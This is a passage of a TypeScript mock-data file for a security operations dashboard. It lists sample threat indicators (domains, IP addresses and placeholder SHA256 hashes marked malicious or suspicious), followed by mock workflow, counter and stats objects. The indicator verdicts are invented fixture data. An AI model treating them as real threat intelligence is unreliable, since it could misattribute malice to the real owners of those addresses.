  { ioc_value: 'evil-update.net',  ioc_type: 'DOMAIN', verdict: 'MALICIOUS',  occurrences: 7,  last_seen: ago(18 * MIN) },
  { ioc_value: 'malware-c2.ru',    ioc_type: 'DOMAIN', verdict: 'MALICIOUS',  occurrences: 6,  last_seen: ago(4.2 * H) },
  { ioc_value: '46.101.127.188',   ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 6,  last_seen: ago(2.1 * H) },
  { ioc_value: 'phish-kit.xyz',    ioc_type: 'DOMAIN', verdict: 'MALICIOUS',  occurrences: 5,  last_seen: ago(11 * H) },
  { ioc_value: '5.34.180.200',     ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 5,  last_seen: ago(6.2 * H) },
  { ioc_value: '185.220.101.45',   ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 4,  last_seen: ago(52 * MIN) },
  { ioc_value: '31.184.199.3',     ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 4,  last_seen: ago(6.8 * H) },
  { ioc_value: 'a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2', ioc_type: 'SHA256', verdict: 'MALICIOUS', occurrences: 3, last_seen: ago(32 * MIN) },
  { ioc_value: '78.128.113.104',   ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 3,  last_seen: ago(15.2 * H) },
  { ioc_value: '194.165.16.78',    ioc_type: 'IP',     verdict: 'MALICIOUS',  occurrences: 3,  last_seen: ago(4.8 * H) },
  { ioc_value: 'f3e2d1c0b9a8f3e2d1c0b9a8f3e2d1c0b9a8f3e2d1c0b9a8f3e2d1c0b9a8f3e2', ioc_type: 'SHA256', verdict: 'MALICIOUS', occurrences: 2, last_seen: ago(3.5 * H) },
  { ioc_value: '95.142.47.100',    ioc_type: 'IP',     verdict: 'SUSPICIOUS', occurrences: 2,  last_seen: ago(3 * H) },
  { ioc_value: '198.54.117.200',   ioc_type: 'IP',     verdict: 'SUSPICIOUS', occurrences: 2,  last_seen: ago(8 * MIN) },
  { ioc_value: '204.13.164.118',   ioc_type: 'IP',     verdict: 'SUSPICIOUS', occurrences: 2,  last_seen: ago(13.5 * H) },
  { ioc_value: '77.247.182.31',    ioc_type: 'IP',     verdict: 'SUSPICIOUS', occurrences: 2,  last_seen: ago(22 * MIN) },
]

// ─── Workflows ────────────────────────────────────────────────────────────────

export const MOCK_WORKFLOWS: WorkflowStatus[] = [
  { name: 'soc-ingest',        active: true, last_exec: ago(30_000)    },
  { name: 'soc-triage',        active: true, last_exec: ago(2 * MIN)   },
  { name: 'soc-error-handler', active: true, last_exec: ago(8 * MIN)   },
]

// ─── Counters & full stats ────────────────────────────────────────────────────

export const MOCK_COUNTERS: DashboardCounters = {
  today:       847,
  queue_depth: 12,
  critical:    23,
  error_rate:  3.2,
}

export const MOCK_STATS: StatsResponse = {
  counters:      MOCK_COUNTERS,
  trend:         MOCK_TREND,
  recent_alerts: MOCK_ALERTS.slice(0, 50),
  top_rules:     MOCK_TOP_RULES,
  top_iocs:      MOCK_IOCS,
  workflows:     MOCK_WORKFLOWS,
}
